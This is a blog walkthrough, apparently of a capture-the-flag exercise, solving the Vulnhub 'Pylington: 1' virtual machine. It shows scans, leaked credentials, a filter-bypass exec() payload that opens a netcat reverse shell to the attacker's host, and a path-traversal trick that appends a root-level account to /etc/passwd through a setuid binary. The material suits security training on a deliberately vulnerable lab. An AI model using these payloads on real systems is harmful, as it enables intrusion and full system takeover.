Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub Pylington: 1 Walkthrough

Vulnhub Pylington: 1 Walkthrough

https://www.vulnhub.com/entry/pylington-1,684/

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                                       
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)    
 80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /register             (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
 /index.html           (Status: 200) [Size: 4065]                                      
 /assets               (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]  
 /404.html             (Status: 200) [Size: 3305]                                      
 /robots.txt           (Status: 200) [Size: 83]

Check robots.txt

 ~ cat robots.txt    
 User-agent: *
 Disallow: /register
 Disallow: /login
 Disallow: /zbir7mn240soxhicso2z

Visit  /zbir7mn240soxhicso2z, get username and password.

 Username: steve
 Password: bvbkukHAeVxtjjVH

Login, get an python IDE, with some string bypass. Use exec function to get reverse shell.

 strimp='imp'+'ort'+' o'+'s;'
 strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
 exec(strimp)
 exec(strcmd)

Get reverse shell.

 ~ nc -nlvp 1234   
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:51044.
 id
 uid=33(http) gid=33(http) groups=33(http)

In home folder of user py, get typing.cc.

 [http@archlinux py]$ ls -la
 ls -la
 total 56
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 .
 drwxr-xr-x 3 root root  4096 Apr  7 18:43 ..
 -rw------- 1 py   py      21 Dec 20 18:44 .bash_logout
 -rw------- 1 py   py      57 Dec 20 18:44 .bash_profile
 -rw------- 1 py   py     141 Dec 20 18:44 .bashrc
 -r-------- 1 py   py      11 Apr  9 12:04 password.txt
 drwx------ 2 py   py    4096 Apr  9 19:31 secret_stuff
 -r-sr-xr-x 1 py   py   19216 Apr  9 12:15 typing
 -r--r--r-- 1 py   py     689 Apr  9 12:15 typing.cc
 -r-------- 1 py   py      34 Apr  9 12:32 user.txt

Check source code of typing.cc. Get password of py.

 [http@archlinux py]$ ./typing
 ./typing
 Let's play a game! If you can type the sentence below, then I'll tell you my password.
 
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 54ezhCGaJV

Ssh login as user py, in /home/py/secret_stuff folder, found backup.cc.

 [py@archlinux ~]$ cd secret_stuff/
 [py@archlinux secret_stuff]$ ls -la
 total 40
 drwx------ 2 py   py    4096 Apr  9 19:31 .
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 ..
 -rwsr-xr-x 1 root root 26128 Apr  9 19:30 backup
 -rw-r--r-- 1 root root   586 Apr  9 19:30 backup.cc
 [py@archlinux secret_stuff]$

Check source code of backup.cc.

 [py@archlinux secret_stuff]$ cat backup.cc
 #include <iostream>
 #include <string>
 #include <fstream>
 
 int main(){
     std::cout<<"Enter a line of text to back up: ";
     std::string line;
     std::getline(std::cin,line);
     std::string path;
     std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
     std::getline(std::cin,path);
 
     if(!path.starts_with("/srv/backups/")){
         std::cout<<"The file must be inside the /srv/backups directory!\n";
     }
     else{
         std::ofstream backup_file(path,std::ios_base::app);
         backup_file<<line<<'\n';
     }
     return 0;
 }

That means we can write new user with root privilege into /etc/passwd.

 [py@archlinux secret_stuff]$ ./backup
 Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
 Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
 [py@archlinux secret_stuff]$ su root2
 Password:      
 [root@archlinux secret_stuff]# id;uname -a
 uid=0(root) gid=0(root) groups=0(root)
 Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0